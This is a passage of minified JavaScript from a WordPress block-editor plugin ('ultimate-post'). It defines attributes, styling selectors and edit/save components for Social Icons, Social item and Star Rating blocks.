Color","ultimate-post")}},{position:4,data:{type:"color",key:"textHvrColor",label:__("Text Hover Color","ultimate-post")}}],initialOpen:!1,store:e}),(0,o.createElement)(a.T,{title:__("Content","ultimate-post"),include:[{position:1,data:{type:"dimension",key:"contentPadding",step:1,unit:!0,responsive:!0,label:__("Padding","ultimate-post")}},{position:2,data:{type:"toggle",key:"contentFullWidth",label:__("Full Width","ultimate-post")}},{position:3,data:{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color2",key:"contentBg",label:__("Background Color","ultimate-post")},{type:"border",key:"contentBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"contentRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color2",key:"contentHvrBg",label:__("Icon  Background","ultimate-post")},{type:"border",key:"contentHvrBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"contentHvrRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")}]}]}}],initialOpen:!1,store:e})),(0,o.createElement)(i.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.yB,{initialOpen:!0,store:e}),(0,o.createElement)(a.Mg,{store:e}),(0,o.createElement)(a.iv,{store:e}))))},6864:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={blockId:{type:"string",default:""},currentPostId:{type:"string",default:""},layout:{type:"string",default:"layout1",style:[{depends:[{key:"layout",condition:"==",value:"layout1"}]},{depends:[{key:"layout",condition:"==",value:"layout2"}]}]},iconInline:{type:"boolean",default:!0,style:[{depends:[{key:"iconInline",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-social-icons-wrapper .block-editor-inner-blocks .block-editor-block-list__layout, \n                {{ULTP}} .ultp-social-icons-wrapper:has( > .wp-block-ultimate-post-social) { display: flex;} \n                {{ULTP}} .ultp-social-icons-wrapper > li:last-child { padding-right: 0px; margin-right: 0px; } \n                {{ULTP}} .block-editor-block-list__layout > div, \n                {{ULTP}} .wp-block-ultimate-post-social { width: auto !important; }"},{depends:[{key:"iconInline",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-social-icons-wrapper .block-editor-inner-blocks .block-editor-block-list__layout, \n                {{ULTP}} .ultp-social-icons-wrapper:has( > .wp-block-ultimate-post-social) { display: block;}  \n                {{ULTP}} .block-editor-block-list__layout > div, \n                {{ULTP}} .wp-block-ultimate-post-social { width: 100%; }"},{depends:[{key:"layout",condition:"==",value:"layout2"},{key:"enableSeparator",condition:"==",value:!0},{key:"iconInline",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-social-icons-wrapper .block-editor-inner-blocks .block-editor-block-list__layout, \n                {{ULTP}} .ultp-social-icons-wrapper:has( > .wp-block-ultimate-post-social) { display: flex;} \n                {{ULTP}} .block-editor-block-list__layout>div:last-child li{ padding-right: 0px; margin-right: 0px;}  \n                {{ULTP}} .block-editor-block-list__layout > div, \n                {{ULTP}} .wp-block-ultimate-post-social { width: auto !important; }"},{depends:[{key:"layout",condition:"==",value:"layout2"},{key:"enableSeparator",condition:"==",value:!0},{key:"iconInline",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-social-icons-wrapper .block-editor-inner-blocks .block-editor-block-list__layout, \n                {{ULTP}} .ultp-social-icons-wrapper:has( > .wp-block-ultimate-post-social) { display: block; }  \n                {{ULTP}} .block-editor-block-list__layout > div, \n                {{ULTP}} .wp-block-ultimate-post-social{ width: 100%; }"}]},iconAlignment:{type:"string",default:"left",style:[{depends:[{key:"iconAlignment",condition:"==",value:"left"},{key:"iconInline",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-social-icons-wrapper:has(> .wp-block-ultimate-post-social ), \n                {{ULTP}} .ultp-social-icons-wrapper > .block-editor-inner-blocks .block-editor-block-list__layout { margin-right:  auto; display: flex; flex-direction: column; align-items: flex-start;}"},{depends:[{key:"iconAlignment",condition:"==",value:"right"},{key:"iconInline",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-social-icons-wrapper:has(> .wp-block-ultimate-post-social ), \n                {{ULTP}} .ultp-social-icons-wrapper > .block-editor-inner-blocks .block-editor-block-list__layout { margin-left: auto; display: flex; flex-direction: column; align-items: flex-end;}"},{depends:[{key:"iconInline",condition:"==",value:!1},{key:"iconAlignment",condition:"==",value:"center"}],selector:"{{ULTP}} .ultp-social-icons-wrapper:has(> .wp-block-ultimate-post-social ), \n                {{ULTP}} .ultp-social-icons-wrapper > .block-editor-inner-blocks .block-editor-block-list__layout { margin: auto auto; display: flex; flex-direction: column; align-items: center;}"},{depends:[{key:"iconInline",condition:"==",value:!0},{key:"iconAlignment",condition:"==",value:"center"}],selector:"{{ULTP}} .ultp-social-icons-wrapper:has(> .wp-block-ultimate-post-social ), \n                {{ULTP}} .ultp-social-icons-wrapper > .block-editor-inner-blocks .block-editor-block-list__layout { margin: auto auto; display: flex; flex-wrap: wrap; justify-content: center;} \n                {{ULTP}} .ultp-social-icons-wrapper .ultp-social-content { justify-content: center; }"},{depends:[{key:"iconAlignment",condition:"==",value:"left"},{key:"iconInline",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-social-icons-wrapper:has(> .wp-block-ultimate-post-social ), \n                {{ULTP}} .ultp-social-icons-wrapper > .block-editor-inner-blocks .block-editor-block-list__layout { margin-right:  auto; display: flex; justify-content: flex-start; flex-wrap: wrap;}"},{depends:[{key:"iconAlignment",condition:"==",value:"right"},{key:"iconInline",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-social-icons-wrapper:has(> .wp-block-ultimate-post-social ), \n                {{ULTP}} .ultp-social-icons-wrapper > .block-editor-inner-blocks .block-editor-block-list__layout { margin-left:  auto; display: flex; justify-content: flex-end; flex-wrap: wrap;}"}]},iconSpace:{type:"object",default:{lg:"17",unit:"px"},style:[{selector:"{{ULTP}} > .ultp-social-icons-wrapper > .block-editor-inner-blocks > .block-editor-block-list__layout, \n            {{ULTP}} .ultp-social-icons-wrapper:has( > .wp-block-ultimate-post-social) { gap: {{iconSpace}}; }"}]},iconTextSpace:{type:"object",default:{lg:"12",ulg:"px"},style:[{selector:"{{ULTP}} .wp-block-ultimate-post-social .ultp-social-content { gap:{{iconTextSpace}}; }"}]},enableIcon:{type:"boolean",default:!0},iconPosition:{type:"string",default:"center",style:[{depends:[{key:"enableIcon",condition:"==",value:!0}],selector:"{{ULTP}} .wp-block-ultimate-post-social .ultp-social-content { align-items:{{iconPosition}}; }"}]},imgRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"socialIconsType",condition:"==",value:"image"}],selector:"{{ULTP}} .wp-block-ultimate-post-social img { border-radius: {{imgRadius}}; }"}]},iconSize:{type:"string"},iconBgSize:{type:"string"},iconSize2:{type:"object",default:{lg:18,replace:1},style:[{selector:"{{ULTP}} .wp-block-ultimate-post-social .ultp-social-bg svg, \n            {{ULTP}} .wp-block-ultimate-post-social .ultp-social-bg img { height:{{iconSize2}}px; width:{{iconSize2}}px; }"}]},iconBgSize2:{type:"object",default:{lg:"",replace:1},style:[{selector:"{{ULTP}} .wp-block-ultimate-post-social .ultp-social-bg { height:{{iconBgSize2}}px; width:{{iconBgSize2}}px; }"}]},iconColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{selector:"{{ULTP}} .wp-block-ultimate-post-social .ultp-social-bg svg { color: {{iconColor}}; }"}]},iconBg:{type:"string",default:"",style:[{selector:"{{ULTP}} .wp-block-ultimate-post-social .ultp-social-bg { background-color: {{iconBg}}; }"}]},iconBorder:{type:"object",default:{openBorder:0,width:{top:2,right:2,bottom:2,left:2},color:"#dfdfdf"},style:[{selector:"{{ULTP}} .wp-block-ultimate-post-social .ultp-social-bg"}]},iconRadius:{type:"object",default:{lg:{top:2,right:2,bottom:2,left:2,unit:"px"},unit:"px"},style:[{selector:"{{ULTP}} .wp-block-ultimate-post-social .ultp-social-bg { border-radius: {{iconRadius}}; }"}]},iconHvrColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{selector:"{{ULTP}} .wp-block-ultimate-post-social .ultp-social-bg:hover svg { color: {{iconHvrColor}}; }"}]},iconHvrBg:{type:"string",default:"",style:[{selector:"{{ULTP}} .wp-block-ultimate-post-social .ultp-social-bg:hover { background-color: {{iconHvrBg}}; }"}]},iconHvrBorder:{type:"object",default:{openBorder:0,width:{top:2,right:2,bottom:2,left:2},color:"#dfdfdf"},style:[{selector:"{{ULTP}} .wp-block-ultimate-post-social .ultp-social-bg:hover"}]},iconHvrRadius:{type:"object",default:{lg:"",unit:"px"},style:[{selector:"{{ULTP}} .wp-block-ultimate-post-social .ultp-social-bg:hover { border-radius: {{iconHvrRadius}}; }"}]},enableText:{type:"boolean",default:!0,style:[{depends:[{key:"enableText",condition:"==",value:!0}]},{depends:[{key:"enableText",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-social-content { display: block !important; }"}]},textTypo:{type:"object",default:{openTypography:1,size:{lg:16,unit:"px"},height:{lg:"24",unit:"px"},decoration:"none",family:"",weight:400},style:[{selector:"{{ULTP}}  .ultp-social-title, {{ULTP}}  .ultp-social-title a"}]},textColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{selector:"{{ULTP}} .ultp-social-title, {{ULTP}} .ultp-social-title a { color: {{textColor}}; }"}]},textHvrColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{selector:"{{ULTP}} .ultp-social-icons-wrapper  > .wp-block-ultimate-post-social:hover .ultp-social-title, \n            {{ULTP}} .ultp-social-icons-wrapper  > .wp-block-ultimate-post-social:hover .ultp-social-title a, \n            {{ULTP}} .block-editor-block-list__block:hover > .wp-block-ultimate-post-social .ultp-social-title, \n            {{ULTP}} .block-editor-block-list__block:hover > .wp-block-ultimate-post-social .ultp-social-title a { color: {{textHvrColor}}; }"}]},contentPadding:{type:"object",default:{lg:{top:"2",bottom:"2",left:"6",right:"6",unit:"px"}},style:[{selector:"{{ULTP}} .wp-block-ultimate-post-social  .ultp-social-content { padding: {{contentPadding}}; }"}]},contentBg:{type:"object",default:{openColor:0,type:"color",color:"var(--postx_preset_Base_2_color)",size:"cover",repeat:"no-repeat"},style:[{selector:"{{ULTP}} .wp-block-ultimate-post-social .ultp-social-content"}]},contentBorder:{type:"object",default:{openBorder:0,width:{top:2,right:2,bottom:2,left:2},color:"var(--postx_preset_Contrast_2_color)"},style:[{selector:"{{ULTP}} .wp-block-ultimate-post-social .ultp-social-content"}]},contentRadius:{type:"object",default:{lg:"",unit:"px"},style:[{selector:"{{ULTP}} .wp-block-ultimate-post-social .ultp-social-content {border-radius: {{contentRadius}}}"}]},contentHvrBg:{type:"object",default:{openColor:0,type:"color",color:"#f5f5f5",size:"cover",repeat:"no-repeat"},style:[{selector:"{{ULTP}} .wp-block-ultimate-post-social .ultp-social-content:hover"}]},contentHvrBorder:{type:"object",default:{openBorder:0,width:{top:2,right:2,bottom:2,left:2},color:"#dfdfdf"},style:[{selector:"{{ULTP}} .wp-block-ultimate-post-social .ultp-social-content:hover"}]},contentHvrRadius:{type:"object",default:{lg:{top:2,right:2,bottom:2,left:2,unit:"px"},unit:"px"},style:[{selector:"{{ULTP}} .wp-block-ultimate-post-social .ultp-social-content:hover { border-radius: {{contentHvrRadius}}; }"}]},contentFullWidth:{type:"boolean",default:!1,style:[{depends:[{key:"iconInline",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-social-icons-wrapper .block-editor-inner-blocks > .block-editor-block-list__layout, \n                {{ULTP}}.wp-block-ultimate-post-social-icons .ultp-social-icons-wrapper { width: 100%; max-width: 100%; }"}]},wrapBg:{type:"object",default:{openColor:0,type:"color",color:"#f5f5f5"},style:[{selector:"{{ULTP}} .ultp-social-icons-wrapper:has(> .wp-block-ultimate-post-social), \n            {{ULTP}} .ultp-social-icons-wrapper > .block-editor-inner-blocks .block-editor-block-list__layout"}]},wrapBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:"{{ULTP}} .ultp-social-icons-wrapper:has(> .wp-block-ultimate-post-social), \n            {{ULTP}} .ultp-social-icons-wrapper > .block-editor-inner-blocks .block-editor-block-list__layout"}]},wrapShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:"{{ULTP}} .ultp-social-icons-wrapper:has(> .wp-block-ultimate-post-social), \n            {{ULTP}} .ultp-social-icons-wrapper > .block-editor-inner-blocks .block-editor-block-list__layout"}]},wrapRadius:{type:"object",default:{lg:"",unit:"px"},style:[{selector:"{{ULTP}} .ultp-social-icons-wrapper:has(> .wp-block-ultimate-post-social), \n            {{ULTP}} .ultp-social-icons-wrapper > .block-editor-inner-blocks .block-editor-block-list__layout { border-radius:{{wrapRadius}}; }"}]},wrapHoverBackground:{type:"object",default:{openColor:0,type:"color",color:"#037fff"},style:[{selector:"{{ULTP}} .ultp-social-icons-wrapper:has(> .wp-block-ultimate-post-social):hover, \n            {{ULTP}} .ultp-social-icons-wrapper > .block-editor-inner-blocks .block-editor-block-list__layout:hover"}]},wrapHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:"{{ULTP}} .ultp-social-icons-wrapper:has(> .wp-block-ultimate-post-social):hover, \n            {{ULTP}} .ultp-social-icons-wrapper > .block-editor-inner-blocks .block-editor-block-list__layout:hover"}]},wrapHoverRadius:{type:"object",default:{lg:"",unit:"px"},style:[{selector:"{{ULTP}} .ultp-social-icons-wrapper:has(> .wp-block-ultimate-post-social):hover, \n            {{ULTP}} .ultp-social-icons-wrapper > .block-editor-inner-blocks .block-editor-block-list__layout:hover { border-radius:{{wrapHoverRadius}}; }"}]},wrapHoverShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:"{{ULTP}} .ultp-social-icons-wrapper:has(> .wp-block-ultimate-post-social):hover, \n            {{ULTP}} .ultp-social-icons-wrapper > .block-editor-inner-blocks .block-editor-block-list__layout:hover"}]},wrapMargin:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-social-icons-wrapper:has(> .wp-block-ultimate-post-social), \n            {{ULTP}} .ultp-social-icons-wrapper > .block-editor-inner-blocks .block-editor-block-list__layout { margin:{{wrapMargin}}; }"}]},wrapOuterPadding:{type:"object",default:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-social-icons-wrapper:has(> .wp-block-ultimate-post-social), \n            {{ULTP}} .ultp-social-icons-wrapper > .block-editor-inner-blocks .block-editor-block-list__layout { padding:{{wrapOuterPadding}}; }"}]},advanceId:{type:"string",default:""},advanceZindex:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-social-icons-wrapper {z-index:{{advanceZindex}};}"}]},hideExtraLarge:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},hideTablet:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},hideMobile:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},advanceCss:{type:"string",default:"",style:[{selector:""}]}}},80400:(e,t,l)=>{"use strict";var o=l(67294),a=l(83100),i=l(60553),n=l(56098),r=l(6864),s=l(29299);const{__}=wp.i18n,{registerBlockType:p}=wp.blocks;(0,a.Z)("https://wpxpo.com/docs/postx/all-blocks/social-icon-block/","block_docs"),p(s,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/social_icons.svg",alt:"Social Icons"}),description:(0,o.createElement)("span",{className:"ultp-block-info"},__("Display customizable Social Icons that link to your social profiles","ultimate-post")),attributes:r.Z,example:{attributes:{previewImg:ultp_data.url+"assets/img/preview/social_icon.svg"}},edit:i.Z,save:n.Z})},25616:(e,t,l)=>{"use strict";l.d(t,{Z:()=>w});var o=l(67294),a=l(53049),i=l(99838),n=l(41557),r=l(31760),s=l(64766),p=l(78764);const{__}=wp.i18n,{InspectorControls:c,RichText:u,useBlockProps:d}=wp.blockEditor,{useState:m,useEffect:g,Fragment:y}=wp.element,{Dropdown:b}=wp.components,{createBlock:v}=wp.blocks,{select:h}=wp.data,{getBlockAttributes:f,getBlockRootClientId:k}=wp.data.select("core/block-editor");function w(e){const[t,l]=m("Content"),{name:w,className:x,setAttributes:T,attributes:_,clientId:C,attributes:{blockId:E,advanceId:S,socialText:P,customImg:L,socialIconType:I,customIcon:B,btnLink:U,enableSubText:M,socialSubText:A}}=e;g((()=>{const e=C.substr(0,6),t=f(k(C));E?E&&E!=e&&(t?.hasOwnProperty("ref")||(0,a.k0)()||t?.hasOwnProperty("theme")||T({blockId:e})):T({blockId:e})}),[C]);const H={setAttributes:T,name:w,attributes:_,setSection:l,section:t,clientId:C};let N;E&&(N=(0,i.Kh)(_,"ultimate-post/social",E,(0,a.k0)()));const j=h("core/block-editor").getBlockParents(C),Z=h("core/block-editor").getBlockAttributes(j[j.length-1]),{enableText:O,enableIcon:R}=Z;function D(e){return I==e}g((()=>{T({enableText:O,enableIcon:R})}),[O,R]);const z=D("image"),F=D("icon"),W=d({...S&&{id:S},className:`ultp-block-${E} ${x}`});return(0,o.createElement)(y,null,(0,o.createElement)(c,null,(0,o.createElement)(p.Z,{store:H})),(0,o.createElement)(r.Z,{include:[{type:"linkbutton",key:"btnLink",onlyLink:!0,value:U,placeholder:"Enter Social URL",label:__("Social Url","ultimate-post")}],store:H}),(0,o.createElement)("li",W,N&&(0,o.createElement)("style",{dangerouslySetInnerHTML:{__html:N}}),(0,o.createElement)("a",{href:"#",className:"ultp-social-content"},(0,o.createElement)(y,null,z&&R&&(0,o.createElement)("div",{className:"ultp-social-bg"},(0,o.createElement)("img",{src:L.url||"#",alt:"Social Image"})),F&&R&&(0,o.createElement)(b,{popoverProps:{placement:"bottom-start"},className:"ultp-social-dropdown",renderToggle:({onToggle:e,onClose:t})=>(0,o.createElement)("div",{onClick:()=>e(),className:"ultp-social-bg"},s.dX[B]),renderContent:()=>(0,o.createElement)(n.Z,{inline:!0,value:B,isSocial:!0,label:"Update Single Icon",dynamicClass:" ",onChange:e=>H.setAttributes({customIcon:e,socialIconType:"icon"})})}),(0,o.createElement)("div",{className:"ultp-social-title-container"},O&&(0,o.createElement)("div",{className:"ultp-social-title"},(0,o.createElement)(u,{key:"editable",tagName:"div",placeholder:__("Label…","ultimate-post"),onChange:e=>T({socialText:e}),onReplace:(e,t,l)=>wp.data.dispatch("core/block-editor").replaceBlocks(C,e,t,l),onSplit:e=>v("ultimate-post/social",{..._,socialText:e}),value:P})),O&&M&&(0,o.createElement)("div",{className:"ultp-social-sub-title"},(0,o.createElement)(u,{key:"editable",tagName:"div",placeholder:__("Sub Text…","ultimate-post"),onChange:e=>T({socialSubText:e}),value:A})))))))}},91030:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r});var o=l(87462),a=l(67294);const{Fragment:i}=wp.element,{useBlockProps:n}=wp.blockEditor;function r(e){const{blockId:t,advanceId:l,socialText:r,customImg:s,socialIconType:p,enableText:c,customIcon:u,enableIcon:d,btnLink:m,btnLinkTarget:g,btnLinkDownload:y,btnLinkNoFollow:b,btnLinkSponsored:v,enableSubText:h,socialSubText:f}=e.attributes;function k(e){return p==e}const w=k("image"),x=k("icon");let T="noopener";T+=b?" nofollow":"",T+=v?" sponsored":"";const _=n.save({...l&&{id:l},className:`ultp-block-${t}`});return(0,a.createElement)("li",_,(0,a.createElement)("a",(0,o.Z)({href:"",className:"ultp-social-content"},m.url&&{href:m.url,target:g},{rel:T,download:y&&"download"}),(0,a.createElement)(i,null,w&&d&&(0,a.createElement)("div",{className:"ultp-social-bg"},(0,a.createElement)("img",{src:s.url,alt:"Social Image"})),x&&d&&(0,a.createElement)("div",{className:"ultp-social-bg"},"_ultp_sc_ic_"+u+"_ultp_sc_ic_end_"),(0,a.createElement)("div",{className:"ultp-social-title-container"},c&&(0,a.createElement)("div",{className:"ultp-social-title",dangerouslySetInnerHTML:{__html:r}}),c&&h&&(0,a.createElement)("div",{className:"ultp-social-sub-title",dangerouslySetInnerHTML:{__html:f}})))))}},78764:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(67294),a=l(53049),i=l(92637);const{__}=wp.i18n,n=({store:e})=>(0,o.createElement)(i.Sections,null,(0,o.createElement)(i.Section,{slug:"button",title:__("Icon","ultimate-post")},(0,o.createElement)(a.T,{title:"inline",include:[{position:1,data:{type:"linkbutton",key:"btnLink",onlyLink:!0,placeholder:"Enter Social URL",label:__("Social Url","ultimate-post")}},{position:2,data:{type:"tag",key:"socialIconType",label:__("Icon Type","ultimate-post"),options:[{value:"icon",label:__("Icon","ultimate-post")},{value:"image",label:__("Image","ultimate-post")},{value:"none",label:__("None","ultimate-post")}]}},{position:5,data:{type:"icon",key:"customIcon",isSocial:!0,label:__("Icon Store","ultimate-post")}},{position:10,data:{type:"media",key:"customImg",label:__("Upload Custom Image","ultimate-post")}},{position:11,data:{type:"color2",key:"contentBg",label:__("Content Background","ultimate-post")}},{position:15,data:{type:"separator",label:__("Icon Style","ultimate-post")}},{position:20,data:{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"iconColor",label:__("Icon Color","ultimate-post")},{type:"color",key:"iconBg",label:__("Icon  Background","ultimate-post")},{type:"border",key:"iconBorder",label:__("Border","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color",key:"iconHvrColor",label:__("Icon Hover Color","ultimate-post")},{type:"color",key:"iconHvrBg",label:__("Icon Hover Background","ultimate-post")},{type:"border",key:"iconHvrBorder",label:__("Hover Border","ultimate-post")}]}]}}],initialOpen:!0,store:e}),(0,o.createElement)(a.T,{title:__("Text","ultimate-post"),include:[{position:1,data:{type:"color",key:"socialTextColor",label:__("Text Color","ultimate-post")}},{position:2,data:{type:"color",key:"socialTextHoverColor",label:__("Text Hover Color","ultimate-post")}},{position:3,data:{type:"toggle",key:"enableSubText",label:__("Enable Sub Text","ultimate-post")}},{position:4,data:{type:"color",key:"socialSubTextColor",label:__("SubText Color","ultimate-post")}},{position:5,data:{type:"typography",key:"subTextTypo",label:__("SubText Typography","ultimate-post")}}],initialOpen:!1,store:e})),(0,o.createElement)(i.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.Mg,{store:e}),(0,o.createElement)(a.iv,{store:e})))},84751:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={blockId:{type:"string",default:""},enableText:{type:"boolean",default:!0},enableIcon:{type:"boolean",default:!0},btnLink:{type:"object",default:{url:"#"}},btnLinkTarget:{type:"string",default:"_blank"},btnLinkNoFollow:{type:"boolean",default:!1},btnLinkSponsored:{type:"boolean",default:!1},btnLinkDownload:{type:"boolean",default:!1},socialText:{type:"string",default:"WordPress"},socialIconType:{type:"string",default:"icon",style:[{depends:[{key:"enableIcon",condition:"==",value:!0}]}]},customIcon:{type:"string",default:"wordpress_solid",style:[{depends:[{key:"socialIconType",condition:"==",value:"icon"}]}]},customImg:{type:"object",default:"",style:[{depends:[{key:"socialIconType",condition:"==",value:"image"}]}]},contentBg:{type:"object",default:{openColor:0,type:"color",color:"#f5f5f5",size:"cover",repeat:"no-repeat"},style:[{selector:"{{ULTP}}.wp-block-ultimate-post-social .ultp-social-content"}]},iconColor:{type:"string",default:"",style:[{depends:[{key:"socialIconType",condition:"==",value:"icon"}],selector:"{{ULTP}} .ultp-social-content .ultp-social-bg svg { color:{{iconColor}}; }"}]},iconBg:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-social-content .ultp-social-bg { background-color:{{iconBg}}; }"}]},iconBorder:{type:"object",default:{openBorder:0,width:{top:2,right:2,bottom:2,left:2},color:"#dfdfdf"},style:[{selector:"{{ULTP}} .ultp-social-content .ultp-social-bg"}]},iconHvrColor:{type:"string",default:"",style:[{depends:[{key:"socialIconType",condition:"==",value:"icon"}],selector:"{{ULTP}} .ultp-social-content:hover .ultp-social-bg svg { color:{{iconHvrColor}}; }"}]},iconHvrBg:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-social-content .ultp-social-bg:hover { background: {{iconHvrBg}};}"}]},iconHvrBorder:{type:"object",default:{openBorder:0,width:{top:2,right:2,bottom:2,left:2},color:"#dfdfdf"},style:[{selector:"{{ULTP}} .ultp-social-content .ultp-social-bg:hover"}]},socialTextColor:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-social-title, {{ULTP}} .ultp-social-title a { color:{{socialTextColor}}; } "}]},socialTextHoverColor:{type:"string",default:"",style:[{selector:".ultp-social-icons-wrapper > {{ULTP}}.wp-block-ultimate-post-social:hover .ultp-social-title, \n            .ultp-social-icons-wrapper > {{ULTP}}.wp-block-ultimate-post-social:hover .ultp-social-title a, \n            .block-editor-block-list__block:hover > {{ULTP}}.wp-block-ultimate-post-social .ultp-social-title, \n            .block-editor-block-list__block:hover > {{ULTP}}.wp-block-ultimate-post-social .ultp-social-title a { color:{{socialTextHoverColor}}; } "}]},enableSubText:{type:"boolean",default:!1},subTextTypo:{type:"object",default:{openTypography:1,size:{lg:12,unit:"px"},height:{lg:"24",unit:"px"},decoration:"none",family:"",weight:400},style:[{depends:[{key:"enableSubText",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-social-sub-title"}]},socialSubText:{type:"string",default:"Sub Text"},socialSubTextColor:{type:"string",default:"",style:[{depends:[{key:"enableSubText",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-social-sub-title { color:{{socialSubTextColor}}; } "}]},hideExtraLarge:{type:"boolean",default:!1,style:[{selector:"div:has(> {{ULTP}}) {display:none;}"}]},hideTablet:{type:"boolean",default:!1,style:[{selector:"div:has(> {{ULTP}}) {display:none;}"}]},hideMobile:{type:"boolean",default:!1,style:[{selector:"div:has(> {{ULTP}}) {display:none;}"}]},advanceCss:{type:"string",default:"",style:[{selector:""}]}}},73342:(e,t,l)=>{"use strict";l.d(t,{Z:()=>p});var o=l(87462),a=l(67294),i=l(83245),n=l(84751);const{Fragment:r}=wp.element,s={v1:{attributes:{...n.Z},save(e){const{btnLink:t,blockId:l,advanceId:n,socialText:s,customImg:p,enableText:c,customIcon:u,enableIcon:d,enableSubText:m,socialSubText:g,btnLinkTarget:y,socialIconType:b,btnLinkDownload:v,btnLinkNoFollow:h,btnLinkSponsored:f}=e?.attributes;function k(e){return b==e}const w=k("image"),x=k("icon");let T="noopener";return T+=h?" nofollow":"",T+=f?" sponsored":"",(0,a.createElement)("li",(0,o.Z)({},n&&{id:n},{className:`ultp-block-${l}`}),(0,a.createElement)("a",(0,o.Z)({href:"",className:"ultp-social-content"},t?.url&&{href:t?.url,target:y},{rel:T,download:v&&"download"}),(0,a.createElement)(r,null,w&&d&&(0,a.createElement)("div",{className:"ultp-social-bg"},(0,a.createElement)("img",{src:p.url,alt:"Social Image"})),x&&d&&(0,a.createElement)("div",{className:"ultp-social-bg"},i.T0[u]),(0,a.createElement)("div",{className:"ultp-social-title-container"},c&&(0,a.createElement)("div",{className:"ultp-social-title",dangerouslySetInnerHTML:{__html:s}}),c&&m&&(0,a.createElement)("div",{className:"ultp-social-sub-title",dangerouslySetInnerHTML:{__html:g}})))))}}},p=[...Object.values(s)]},71807:(e,t,l)=>{"use strict";var o=l(67294),a=l(25616),i=l(91030),n=l(84751),r=l(60134),s=l(73342);const{__}=wp.i18n,{registerBlockType:p}=wp.blocks;p(r,{parent:["ultimate-post/social-icons"],icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/social.svg",alt:"Social item"}),attributes:n.Z,edit:a.Z,save:i.Z,deprecated:s.Z})},11645:(e,t,l)=>{"use strict";l.d(t,{Z:()=>y});var o=l(67294),a=l(53049),i=l(99838),n=l(31760),r=l(23372);const{__}=wp.i18n,{useEffect:s,useState:p,Fragment:c}=wp.element,{getBlockAttributes:u,getBlockRootClientId:d}=wp.data.select("core/block-editor"),{RichText:m,useBlockProps:g}=wp.blockEditor;function y(e){const[t,l]=p("Content"),{setAttributes:y,name:v,className:h,attributes:f,clientId:k,attributes:{blockId:w,previewImg:x,advanceId:T,currentPostId:_,starType:C,enableTitle:E,titleText:S,startRange:P,smallRange:L,largeRange:I}}=e;s((()=>{const e=k.substr(0,6),t=u(d(k));(0,a.qi)(y,t,_,k),w?w&&w!=e&&(t?.hasOwnProperty("ref")||(0,a.k0)()||t?.hasOwnProperty("theme")||y({blockId:e})):y({blockId:e}),y({className:h})}),[k]);const B={setAttributes:y,name:v,attributes:f,setSection:l,section:t,clientId:k};let U;if(w&&(U=(0,i.Kh)(f,"ultimate-post/star-rating",w,(0,a.k0)())),x)return(0,o.createElement)("img",{style:{marginTop:"0px",width:"420px"},src:x});const M="small"==P?L:I,[A,H]=p(M);s((()=>{H(M)}),[P,L,I]);const[N,j]=p(null),Z=null!=N?N:A,O=null!=N?N:M,R=g({className:`ultp-block-${w} ${h}`,...T&&{id:T}});return(0,o.createElement)(c,null,(0,o.createElement)(r.Z,{store:B}),(0,o.createElement)(n.Z,{include:[{type:"template"}],store:B}),(0,o.createElement)("div",R,U&&(0,o.createElement)("style",{dangerouslySetInnerHTML:{__html:U}}),(0,o.createElement)("div",{className:"ultp-block-wrapper ultp-rating-block"},(0,o.createElement)("div",{className:"ultp-rating-icon"},Array("small"==P?5:10).fill().map(((e,t)=>{const 